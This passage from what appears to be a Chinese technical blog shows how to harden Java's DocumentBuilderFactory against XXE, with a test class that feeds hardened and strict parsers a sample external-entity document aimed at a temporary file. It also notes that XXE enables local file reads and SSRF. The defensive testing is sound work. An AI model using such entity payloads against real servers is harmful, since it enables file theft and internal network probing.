        Set them in code. Taking DocumentBuilderFactory as an example:

String xml = "xxe.xml";
DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();
df.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); // Compliant
df.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); // compliant
DocumentBuilder builder = df.newDocumentBuilder();
Document document = builder.parse(new InputSource(xml));
DOMSource domSource = new DOMSource(document);
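
        Whether the settings take effect can be verified by feeding a hardened parser a document with an external entity. The sketch below assumes the JDK's built-in parser (a third-party implementation on the classpath may not accept these attributes) and again uses a temporary file as the entity target. The strict variant, which rejects any DOCTYPE through the disallow-doctype-decl feature, is an addition that this article does not cover. HardenedParserDemo and its methods are hypothetical names.

```java
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

class HardenedParserDemo {
    // The configuration shown above: no protocol may be used for external DTDs,
    // external entities, or external schemas.
    static DocumentBuilderFactory hardened() {
        DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();
        df.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        df.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return df;
    }

    // Stricter variant (not from the article): refuse any document with a DOCTYPE.
    static DocumentBuilderFactory strict() throws Exception {
        DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();
        df.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        return df;
    }

    // Returns true if parsing fails with a SAXException, false if the document is accepted.
    static boolean isRejected(DocumentBuilderFactory df, String xml) throws Exception {
        try {
            df.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
            return false;
        } catch (SAXException e) {
            return true;
        }
    }

    // Builds a document with an external entity pointing at a temporary file and
    // checks whether the given factory refuses to parse it.
    static boolean blocksExternalEntity(DocumentBuilderFactory df) throws Exception {
        Path tmp = Files.createTempFile("xxe-defense", ".txt");
        try {
            Files.write(tmp, "harmless placeholder".getBytes(StandardCharsets.UTF_8));
            String xml = "<!DOCTYPE users [ <!ENTITY test SYSTEM \"" + tmp.toUri() + "\"> ]>"
                    + "<users><name>&test;</name></users>";
            return isRejected(df, xml);
        } finally {
            Files.deleteIfExists(tmp);
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("hardened blocks entity: " + blocksExternalEntity(hardened()));
        System.out.println("strict blocks entity:   " + blocksExternalEntity(strict()));
        System.out.println("plain XML rejected:     " + isRejected(hardened(), "<users/>"));
    }
}
```

        The JDK's default error handler may also print the parser's fatal error message to standard error when a document is rejected.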

Summary:

        When testing, any upload point or any place that accepts XML data may be vulnerable to XXE. Whether files can be read or the intranet can be scanned depends on what the server actually returns.

        The principle behind XXE is simple: XML's external reference feature can be abused, and depending on the protocols allowed it leads to SSRF or local file reads.

Origin blog.csdn.net/GalaxySpaceX/article/details/131792450